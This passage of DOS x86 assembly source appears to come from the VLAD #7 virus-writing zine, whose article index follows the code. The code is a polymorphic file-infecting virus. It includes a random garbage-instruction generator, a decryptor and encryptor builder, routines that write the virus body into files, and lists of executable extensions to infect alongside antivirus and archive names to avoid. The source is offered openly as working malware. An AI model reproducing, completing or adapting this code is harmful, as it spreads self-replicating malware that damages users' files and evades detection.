	MOV  BYTE PTR DS:[SI+1],AL
	MOV  AL,BYTE PTR DS:[BX+6+OFFSET PACK_1-START+10h]
	MOV  AH,AL
	MOV  WORD PTR DS:[SI+2],AX
	SUB  AL,40h
	MOV  BL,AL
	CALL FILL	; Make a register busy
	CALL MAKE
;-----------------------------------------------
;	Second instruction
;-----------------------------------------------
instr2:
	call f_reg
	mov  al,40h
	add  al,bl
	mov  byte ptr ds:[si+7],al
	in   ax,40h
	and  ax,0Fh
	sub  ax,(3584-28)/2
	stosw
	call make
;------------------------------------------------
;	Third instruction
;------------------------------------------------
instr3:
	call f_reg

	mov  byte ptr ds:[si+5],bl

	mov  al,8
	mul  bl
	add  byte ptr ds:[si+1],al
	in   ax,40h
	add  ax,di
	stosw
	push di
	mov  word ptr ds:[offset encryptor - start + 10h - 4],ax
	call make
;--------------------------------------------------
;	To choose operations
;--------------------------------------------------
	CALL ZEROTWO

	mov  al,byte ptr ds:[offset mirror1 - start + 10h + bx]
	mov  byte ptr ds:[si],al
	neg  bx
	mov  al,byte ptr ds:[offset mirror1 - start + 10h + bx + 2]
	mov  byte ptr ds:[offset encryptor-start+10h+2],al

	call RND

	and  bl,1
	mov  al,byte ptr ds:[offset mirror2 - start + 10h + bx]
	add  byte ptr ds:[si+5],al
	add  al,3
	mov  byte ptr ds:[offset encryptor-start+10h+6],al

;-----------------------------------------------------
;	To copy rest of decryptor
;-----------------------------------------------------
	movsw
	call make
	movsb
	call make
	movsb
	call make
	movsw
	IN   AL,40h
	MOV  BYTE PTR DS:[OFFSET ENCRYPTOR - START + 10h + 7],AL
	STOSB
	inc  si
	call make
	movsw
	MOV  AX,0FFh
	SUB  AX,DI
	POP  BX
	ADD  AX,BX	; BYTE for JNZ instruction
	stosb
	call make

	POP  SI
	MOV  AX,DI
	ADD  AX,WORD PTR DS:[newbytes+14h]
	MOV  WORD PTR ES:[SI],AX		; Offset of crypted code

	MOV  CX,(3584-28)/2
	MOV  BX,0FFFFh
	POP  DS
	POP  SI
ENCRYPTOR:
	MOVSW
	XOR  WORD PTR ES:[DI-2],BX
	SUB  BX,0
	LOOP ENCRYPTOR

	PUSH CS
	POP  DS

	MOV  DI,3584-28
	IN   AX,40H
	STOSW
	MOV  BX,AX
	MOV  SI,BYTES
	MOV  CX,0Dh
	MOV  AX,'EM'
CYCLE:
	XOR  AX,BX
	STOSW
	LODSW
	LOOP CYCLE
;-------------------------------
;	Write modul to file...
;-------------------------------
	PUSH ES
	POP  DS
	XOR  DX,DX
	MOV  CX,DI
	CALL WRITE_X
	CALL SEEK_H
	PUSH CS
	POP  DS
	RET
MODUL	ENDP

NEW_SEG PROC NEAR
	PUSH ES
	POP  DS
	MOV  SI,VIDEO
	MOV  DI,ES
	CMP  DI,SI
	JNE  NO_NEW
	ADD  SI,100h
NO_NEW:
	MOV  ES,SI
	XOR  SI,SI
	XOR  DI,DI
	IN   AX,40h
	RET
NEW_SEG ENDP

REMOVE  PROC NEAR
	PUSH CS
	POP  DS
	MOV  CX,VL/2+08h
	MOV  DI,10h
	REP  MOVSW
	RET
REMOVE  ENDP

TRIM    PROC NEAR
	SBB  DX,0
	XCHG CX,AX
	XCHG DX,CX
	XOR  AL,AL
	CALL SEEK_Z
	RET
TRIM	ENDP

READ_L  PROC NEAR
	CALL SEEK_E
	JC   NO_FILE

	SUB  AX,1Ch
	CALL TRIM

	PUSH CS
	POP  DS
	MOV  CX,1Ch
	MOV  DX,BYTES
	CALL READ_X

	CLD
	MOV  SI,BYTES
	LODSW
	PUSH SI
	MOV  CX,0Dh
DECODE:
	XOR  WORD PTR DS:[SI],AX
	INC  SI
	INC  SI
	LOOP DECODE

	POP  SI
	LODSW
NO_FILE:
	CMP  AX,'EM'	; Brand name ;-)
	RET
READ_L  ENDP

WRITE_L PROC NEAR
	PUSH SI
	CALL SEEK_H

	POP  DX
	CALL WRITE_H
TALE_OUT:
	MOV  AL,2
	CALL SEEK_X

	SUB  AX,0E00h
	CALL TRIM

	XOR  CX,CX
	CALL WRITE_X
	RET
WRITE_L ENDP

S_INIT  PROC NEAR
	MOV  CX,DS:[HNEW]
	MOV  DX,DS:[LNEW]
RCOMP:
	XOR  AX,AX
	CMP  CX,DS:[NO_HIGH]
	JB   N_FLAG
	JA   S_FLAG
	CMP  DX,DS:[NO_LOW]
	JB   N_FLAG
S_FLAG:
	STC
	RET
N_FLAG:
	CLC
	RET
S_INIT  ENDP

make	proc near
;-----------------------
; Makes from 1 up to 16
; bytes of garbage code
;-----------------------
	in   ax,40h
	and  ax,00001111b
	inc  ax			; Number of bytes
	mov  dx,ax
poly:
	push dx
;------------------------------------
;	Generate 1-byte command
;------------------------------------
form_1:
	call RND

	mov  al,byte ptr ds:[bx+offset data_1-start+10h]
good_1:
	stosb
	dec  dx
form_2:
;-------------------------------------
;	Generate 2-bytes command
;-------------------------------------
	cmp  dx,2
	jb   poly_stop

	call RND
	call _free
	jnz  form_3

	mov  al,8
	mul  bl
	add  al,0C0h
	push ax
	call RND
	pop  ax
	add  al,bl
	xchg ah,al

	mov  al,byte ptr ds:[bx+offset data_2-start+10h]
	stosw
	dec  dx
	dec  dx
form_3:
;-------------------------------------
;	Generate 3-bytes command
;-------------------------------------
	cmp  dx,3
	jb   poly_stop

	call _form
	jnz  form_4
	mov  al,83h
	stosw
	in   al,40h
	stosb
	sub dx,3	
form_4:
;-------------------------------------
;	Generate 4-bytes command
;-------------------------------------
	cmp  dx,4
	jb   poly_stop

	call _form
	jnz  poly_stop
	mov  al,81h
	stosw
	in   ax,40h
	xor  ax,di
	stosw
	sub  dx,4
poly_stop:
	or   dx,dx
	jnz  form_1

	pop  dx

	ret
make    endp

f_reg   proc near
instr_x:
	call rnd
	call _free
	jnz  instr_x
	call fill
	mov  al,0B8h
	add  al,bl
	stosb
	ret
f_reg   endp

zerotwo proc near
	call rnd
	mov  ax,bx
	mov  bl,3
	div  bl
	mov  bl,ah
	ret
zerotwo endp

db	'-=Unlimited Grief=-'

STR1    PROC NEAR
	PUSH SI
DOCOMP:
	CMPSW
	JNZ  NEXTSTR
	CMPSB
	JZ   EXITSTR
	DEC  SI
	DEC  DI
NEXTSTR:
	INC  SI
	DEC  DI
	DEC  DI
	DEC  CX
	JNZ  DOCOMP
EXITSTR:
	POP  SI
	JMP  SHORT CHKAWAY
STR1    ENDP

CHKNAME PROC NEAR
	MOV  AL,4
CHK1:
	PUSH DI
	MOV  CL,6
CHKTHIS:
	PUSH CX
	PUSH DI
	MOV  CL,AL
	CALL STR1
	POP  DI
	POP  CX
	JNZ  EXITNAME
	INC  DI
	LOOP CHKTHIS
EXITNAME:
	POP  DI
CHKAWAY:
	OR   CX,CX
	RET
CHKNAME ENDP

;-----------------------------------------------------------------
;	These shity programs are too stinky to be even infected
;-----------------------------------------------------------------
EXTEN	db	'COM','EXE','OVL','OVR'
ANTIV	db	'PRO','SCA','EXT','WEB'
ARCHV	db	'ARJ','RAR','LHA','ZIP'
DONOT	db	'COM','WIN'
ALL	db	'CHK'
;-----------------------------------------------------------------
;	Data for polymorphic engine
;-----------------------------------------------------------------
	data_1   db   0f5h,0f8h,0f9h,0fbh,0fch,0fdh,090h,0cch
	data_2   db   03h,0bh,013h,01bh,023h,02bh,033h,085h
pack_1:
	mov_reg1  db  0beh,0bfh,0bbh
	xor_reg1  db  04h,05h,07h
	inc_reg1  db  046h,047h,043h
operations:
	mirror1	 db  01h,031h,029h
	mirror2  db  0c0h,0e8h
;-------------------------------------------------------------------

_free   proc near
	push cx
	push bx
	mov  cl,bl
	mov  bl,1
	shl  bl,cl
	test bp,bx
	pop  bx
	pop  cx
	ret
_free   endp

_form   proc near
	call RND
	and  al,03Fh
	add  al,0C0h
	xchg al,ah
	call _free
	ret
_form	endp

FILL    PROC NEAR
	PUSH BX
	PUSH CX
	MOV  CL,BL
	MOV  BL,1
	SHL  BL,CL
	POP  CX
	ADD  BP,BX
	POP  BX
	RET
FILL    ENDP
	
RND	PROC NEAR
;---------------------------
; A bad way for getting a
; random number
;---------------------------
	PUSH DX
	IN   AX,[40h]
	ADD  AX,DS:[OFFSET SEED-START+10h]
	MOV  DX,25173
	MUL  DX
	ADD  AX,13849
	POP  DX
	MOV  DS:[OFFSET SEED-START+10h],AX
	XOR  AX,DS:[OFFSET FORXOR-START+10h]
	MOV  BX,AX
	AND  BX,7
	RET
RND	ENDP

SEED	DW   37849
FORXOR  DW   559

db	'Kiev',27h,'96'		; Kiev'96

INTINST:
	MOV  BX,0FFFFh
	MOV  DX,SS
	MOV  BP,SP
	MOV  CX,(3584-28)/2
	CALL FUCK
FUCK:
	POP  SI
	ADD  SI,OFFSET GRID-FUCK
	MOV  AX,CS
PUZZLE:
	CLI
	MOV  SS,AX
	MOV  SP,SI
CRYPT:
	POP  AX
	XOR  AX,BX
	PUSH AX
	INC  SP
	INC  SP
	LOOP CRYPT
	MOV  SS,DX
	MOV  SP,BP
	STI
GRID:
	MOV  AX,0F0Fh
	MOV  CX,(3584-28)/3
	CALL FUCK1
FUCK1:
	POP  SI
	ADD  SI,OFFSET FICTION - FUCK1
GRID_IT:
	SUB  WORD PTR DS:[SI],AX
	INC  SI
	INC  SI
	INC  SI
	LOOP GRID_IT
	JMP  SHORT FICTION
	db   'EMME 3'
FICTION:
	MOV  CX,(3584-28)/4
	CALL FUCK2
FUCK2:
	POP  SI
	ADD  SI,OFFSET ANTIWEB - FUCK2
	CLD
MIX_IT:
	LODSW
	XOR  WORD PTR DS:[SI],AX
	LODSW
	LOOP MIX_IT
	JMP  SHORT ANTIWEB
	db   'Killer'
ANTIWEB:
;--------------------------------
;	ANTI-WEB PATTERN
;--------------------------------
	MOV  AL,0E0h
	MOV  AH,0E0h
	INT  21h
	OR   AL,AL
	INT  20h
	PUSH CS
	POP  DS
;--------------------------------
;	INSTALLATION PATTERN
;--------------------------------
PATTERN:
	XOR  WORD PTR DS:[DI],BX
	INC DI
	INC DI
	SUB BX,0
	INC CX
	JNZ PATTERN
;----------------------------------------
VIREND:
;----------------------------------------
;	Is it really COOL?
;----------------------------------------
	INT 20h		; ORIGINAL BYTES
;----------------------------------------
	END  STARTA
- VLAD #7 INDEX -

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      

No Flags
ARTICLE.2_2       Goodbye Virus
ARTICLE.2_3       Boot Sector Tutorial
ARTICLE.2_4       STAOG Linux Virus
ARTICLE.2_5       Pow Boot Virus
ARTICLE.2_6       Wulf2
ARTICLE.2_7       Tbscan Internals

ARTICLE.3_1      

VLAD Viruses
ARTICLE.3_2       TVIR600
ARTICLE.3_3       Vecna Boot Virus
ARTICLE.3_4       Padania Virus
ARTICLE.3_5       HooDoo Virus
ARTICLE.3_6       Pandemonium Virus
ARTICLE.3_7       Black Lotus

ARTICLE.4_1      

Zip Virus
ARTICLE.4_2       Archive Infect
ARTICLE.4_3       Virstop Article
ARTICLE.4_4       Boza Makes Bontchev Barf Virus
ARTICLE.4_5       Killer Virus
ARTICLE.4_6       Muraroa End
ARTICLE.4_7       Mages Fury

About VLAD - Links - Contact Us - Main